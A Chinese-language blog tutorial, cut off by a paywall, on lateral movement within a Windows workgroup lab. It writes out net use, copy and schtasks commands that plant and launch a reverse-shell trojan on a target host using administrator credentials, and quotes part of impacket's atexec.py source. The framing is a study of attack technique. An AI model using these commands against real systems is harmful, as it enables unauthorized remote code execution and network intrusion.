工作组下的横向移动-完全初学者指南

最新推荐文章于 2023-08-24 07:44:29 发布
最新推荐文章于 2023-08-24 07:44:29 发布
阅读量1.6k 收藏 3
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xmd213131/article/details/109399320
版权

文章目录

一.测试环境

win7(192.168.100.132)->winserver2016(192.168.100.133)
注意:所有的手法均在没有开启任何防护软件(防火墙,windows_defender都关闭了的)的情况下进行的!

二.横向手法

1.系统漏洞类

(1).ms17-010

2.凭据类

(1).使用IPC$进行横向移动

1)前提条件:
1.对方主机开启admin$和c$等默认共享,通过ipc$连接可以访问到这些默认共享。

在这里插入图片描述

2.对方启用了administrator账户或者使用了HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy项存在(默认不存在)且配置为1将授予来自管理员所有本地成员的远程连接完整的高完整性令牌。

在这里插入图片描述

要求2的原因:(如果没有使用rid=500的账户或者启用了令牌过滤,那么就没有使用dir,copy等命令的权限)

在 windows vista 以上版本操作系统的任何非 RID 500 本地管理员帐户使用远程连接无论是通过 WMIPSEXEC 还是其他方法即使用户是本地管理员返回的令牌都是已过滤的管理员令牌也称受限令牌。

受限令牌是主令牌或模拟令牌的子集被修改用于控制特权或权限具有以下特性

其完整性级别被设置为“中”。

管理员 SID 和 管理员类的 SID 被标记为“仅仅拒绝”而不是直接把这些组移除。

所有的特权都被移除除了以下这些Change Notify、Shutdown、Undock、Increase Working Set 和 Time Zone。

通俗来说就是管理员组的非 RID 500 账户登录之后是没有过 UAC 的所有特权都被移除。而 RID 500 账户登录之后也以完全管理特权“完全令牌模式”运行所有应用程序实际是不用过 UAC 的。

对于本地“管理员”组中的域用户帐户当具有域用户帐户的用户远程登录 windows 操作系统并且该用户是管理员组的成员时域用户将在远程计算机上以完全管理员访问令牌运行并且该用户的 UAC 被禁用在该会话的远程计算机上。
2)攻击手法:
1.使用schtasks(计划任务)
1.使用 net use \\ip /u:user password建立ipc$连接

在这里插入图片描述

2.使用copy命令将木马拷贝到目标主机上

copy shell.exe \\192.168.100.133\c$\users\public

在这里插入图片描述

3.使用计划任务启动木马反弹shell

schtasks /create /s 192.168.100.133 /u administrator /p 123456 /tn shell /tr "C:/users/public/shell.exe" /sc onstart
schtasks /run /s 192.168.100.133 /tn shell /u administrator /p 123456

在这里插入图片描述

4.成功收到反弹shell

在这里插入图片描述

使用atexec

下载地址:https://github.com/SecureAuthCorp/impacket
在这里插入图片描述

命令格式:atexec.py 域/用户:密码@ip “执行的命令”

分析源代码:(只分析了如何创建和执行的计划任务这几个关键步骤)

首先是play函数中的关键,其设置了使用的传输协议,在DCERPCTransportFactory中有很多种传输方式

在这里插入图片描述

def play(self, addr):
        stringbinding = r'ncacn_np:%s[\pipe\atsvc]' % addr#ncacn_np:%s[\pipe\atsvc]
        #这里指定了使用的传输协议,为命名管道,使用smb协议进行通信。
        rpctransport = transport.DCERPCTransportFactory(stringbinding)
        #atsvc接口是用于与计划任务相关操作的,详细连接在下面
        #https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/cf7d3ced-70f2-4c7e-802e-93d4dfb7d089

而后下一个关键点就是一个xml

if self.sessionId is not None:
            cmd, args = cmd_split(self.__command)
        else:
            cmd = "cmd.exe"
            args = "/C %s > %%windir%%\\Temp\\%s 2>&1" % (self.__command, tmpFileName)
        #这里指定了要执行的命令,可以看到是将我们执行的命令的结果写入到temp下的一个文件中,文件名随机生成。
        xml = """<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <CalendarTrigger>
      <StartBoundary>2015-07-15T20:35:13.2757294</StartBoundary>
      <Enabled>true</Enabled>
      <ScheduleByDay>
        <DaysInterval>1</DaysInterval>
      </ScheduleByDay>
    </CalendarTrigger>
  </Triggers>
  <Principals>
    <Principal id="LocalSystem">
      <UserId>S-1-5-18</UserId>
      <RunLevel>HighestAvailable</RunLevel>
    </Principal>
  </Principals>
  <Settings>
    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
    <StopIfGoingOnBatteries>false</
最低0.47元/天 解锁文章
「已注销」
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
鼠标滚轮控制网页横向移动实现思路
09-05
设置window的scrollLeft值,这里一定要是window不能是body否则滚动有问题,绑定事件mousewhell 也必须是在body上,感兴趣的各位可以了解下哈,希望可以帮助到你
内网横向移动—NTLM-Relay重放&Responder中继攻击&Ldap&Ews
剁椒鱼头没剁椒的博客
07-30 952
在正常CS或者MSF上线的时候,我们的目标通常是普通用户上线,如何提权到system权限,但是有时候需要使用到administrator,就会导致我们没有会话去连接,那么这里就是介绍一下,如何切换会话中的权限,同时要注意的是,低权限会话是无法切换至高权限的,但是高权限能够切换至低权限,相当于system权限能够切换到administrator,但是webadmin权限是无法切换至administrator权限的,这个是需要注意的。看配置是需要4h4g…
【内网安全-横向移动】IPC$连接--->计划任务--->上线
02-07 8761
横向移动-IPC$连接】at&schtasks创建定时任务上线
Win7 拒绝访问 Admin$, IPC$ , c$ , d$ , e$ 处理方法,不用重启
qq_33593667的博客
01-26 4167
许多小伙伴可能都需要用到 网络路径访问,但都是会出现拒绝,尤其是win7系统, 即使你输入的账号与密码是完全正确,但还是会提示拒绝访问,有木有、、、 //IP 是你访问的目标IP \\IP\Admin$ \\IP\c$ \\IP\d$ \\IP\e$ 我为了开启远程的访问,必须要进入 Admin$这个文件,也是绞尽脑汁试了许多方法, 但结果都以失败告终, 但是我发现在本机内是可以正常访问的,下图 那说明一问题,至少是可以但可能是某种设定打开限定了你的访问 依据这个思路去处理,果
【网络安全】企业内网中的横向移动
HBohan的博客
08-25 1435
横向移动,是攻击者侵入企业系统时,获取相关权限及重要数据的常见攻击手法。了解横向移动的原理有助于个人和企业更好地维护网络安全。 中安网星特此推出了横向移动科普系列,本系列共有三篇文章,我们会以简单轻松的话语为大家讲解横向移动的内容。 近年来,随着网络攻击、勒索事件频发,企业安全防护需求迅速上升,传统安全防护中以密码和权限管理为核心的单一防护模式愈发不能满足目前的网络安全环境。因而,深入了解攻击思路,“对症下药”,是目前网络安全行业发展的重要方向。 本篇文章将就“横向移动”这一典型攻击行为进行简单阐述,从攻击
内网渗透测试:内网横向移动基础总结
KH_FC的博客
12-29 5497
内网渗透测试:内网横向移动基础总结 横向移动 在内网渗透中,当攻击者获取到内网某台机器的控制权后,会以被攻陷的主机为跳板,通过收集域内凭证等各种方法,访问域内其他机器,进一步扩大资产范围。通过此类手段,攻击者最终可能获得域控制器的访问权限,甚至完全控制基于Windows操作系统的整个内网环境,控制域环境下的全部机器。 在这篇文章中,我们来讲解一下横向移动的思路与攻击手法。 由于最近开学了有很多很多的事,所以一直没有时间更新,文章可能略显仓促,不足之处还请多多指教。 本文大多是我最近的学习总结,专为想我一样
schtasks 创建秒级定时任务
chen50130的专栏
01-07 1536
schtasks /create /tn [name] /tr [script]  /sc WEEKLY /D MON,TUE,WED,THU,FRI /st 08:55:30 st 会把秒数忽略掉,执行上面的脚本,最后结果是08:55,30会被忽略。 schtasks /create /xml [filename] xml 文件中可以天加秒数  ...
行业文档-设计装置-导纸轮横向移动锁紧机构.zip
09-02
行业文档-设计装置-导纸轮横向移动锁紧机构.zip
反射和折射电磁波的横向移动
03-05
推导了介质界面反射和折射电磁波的能量中心横向移动的计算式,它表明,横向移动的量值与入射波束的线度、入射角及介质的介电常数、磁导率有关。
刘美兰-横向移动车辆定义参数说明.doc
03-21
当采用梁单元进行横向分析时,车轮荷载的作用效应与车轮荷载(行车向)分布宽度和(梁段)纵向宽度有关,等效荷载= (即车轮荷载*梁段长度/车轮荷载行车向分布长度),对应于程序的横向 车道线定义时参数输入: 比例...
行业文档-设计装置-原纸架支臂横向移动装置.zip
08-25
行业文档-设计装置-原纸架支臂横向移动装置.zip
【内网安全-横向移动】基于SMB协议-PsExec
02-10 8555
横向移动-基于SMB协议】PsExec
WMI横向移动
网络安全。
02-02 3114
0x01 WMI横向移动简介 简介 WMI全称“windows管理规范”,从win2003开始一直存在。它原本的作用是方便管理员对windows主机进行管理。因此在内网渗透中,我们可以使用WMI进行横向移动。 利用条件 1、WMI服务开启,端口135,默认开启。 2、防火墙允许135、445等端口通信。 0x02 windows自带wmic工具横向移动(推荐) 实际测试(wmic) 08 -&g...
横向移动-传递攻击SMB服务利用psexec&smbexec
m0_65096687的博客
05-28 1164
win2012以上版本,关闭了wdigest 或者安装了 KB287199补丁。无法获取明文密码总的来说就是win2012后无法获取明文密码解决办法就是:1.可以利用哈希hash传递(pth,ptk等进行移动)2.利用其他服务协议(SMB,WMI)进行哈希hash移动3.注册表开启wdigest Auth 进行获取明文密码4.利用第三方工具(hashcat)进行破解获取。
内网渗透(四十三)之横向移动篇-SMB远程执行命令横向移动
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-20 632
SMB 全称是 Server Message Block 翻译过来是服务器信息块,它也是一种客户端到服务器的通信协议。除此之外,SMB 协议也被称为请求-回复协议。客户端与服务器建立连接后,客户端可以向服务器发送SMB命令允许用户访问共享、打开、读取或者是写入文件。利用条件:开启了445端口。
内网安全-常见横向移动总结
weixin_45701675的博客
04-25 5582
域内横向移动技术是在复杂的内网攻击中被广泛使用的一种技术,尤其是在高级持续威胁中,攻击者会利用该技术,以被攻陷的机器为跳板,访问其他域内主机,扩大资产范围(包括跳板机器中的文档和存储的凭证,以及通过跳板机器连接的数据库、域控制器或其他重要资产)。 通过此类攻击手段,攻击者最终可能获取域控制器的访问权限,甚至完全控制基于Windows操作系统的基础设施和业务相关的关键账户。因此,必须使用强口令来保护特权用户不被用于横向移动攻击,从而避免域内其他机器沦陷。建议管理员定期修改密码,从而使攻击者获取的权限失效。
内网安全:WMI协议与SMB协议横向移动
最新发布
qq_61553520的博客
08-24 1754
此外,SMB协议还经过不断的发展和改进,最新的版本是SMB3,它引入了更高的性能和安全性特性。它是在局域网(LAN)中广泛使用的一种协议,最初由IBM开发,后来由微软引入并逐渐发展为现代的SMB协议。WMI协议的主要目标是提供一种统一的接口,使系统管理员和开发人员能够通过编程方式获取和控制Windows操作系统的各种管理信息。通过WMI协议,可以访问和操作计算机的硬件、操作系统、网络、进程、服务等各个方面的信息。SMB协议的作用是允许计算机之间共享文件和资源,并提供对这些共享资源的访问和管理。
Windows 横向移动的常用技术
cike_y
07-06 1631
横向移动不仅仅是需要收集明文凭据,还需要收集密文凭据,在遇到防火墙受阻和端口限制的情况下,我们可以使用建立端口转发稳定的隧道来与目标进行通信,当用户拥有某些权限时,我们也可以扩展危害性,感染其他用户来进行横向移动
【内网安全-横向移动】WMI-WMIC命令&相关内网工具
02-08 8842
横向移动-WMI-WMIC命令】wmic、impacket-wmiexec、wmicmd.exe、WMIHACKER
el-table 横向滚动条随页面上下移动
06-13
如果您想要让 `el-table` 的横向滚动条随页面上下移动,可以使用CSS中的`sticky`属性来实现。具体步骤如下: 1. 给`el-table`的外层容器添加如下CSS样式: ```css .wrapper { position: -webkit-sticky; /* Safari */ position: sticky; top: 0; } ``` 这里的`.wrapper`可以替换成您实际使用的包裹`el-table`的容器类名。 2. 给`el-table`添加`max-height`属性,并为其设置一个合适的高度值。这是为了防止表格数据过多时,表格出现滚动条而影响整体布局。 ```html <el-table :data="tableData" style="width: 100%; max-height: 500px;"> <!-- 表格列定义 --> </el-table> ``` 此时,`el-table`的横向滚动条就会随着页面的上下滚动而移动了。如果您的表格数据较多,可以通过调整容器的`max-height`值来让表格出现滚动条。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值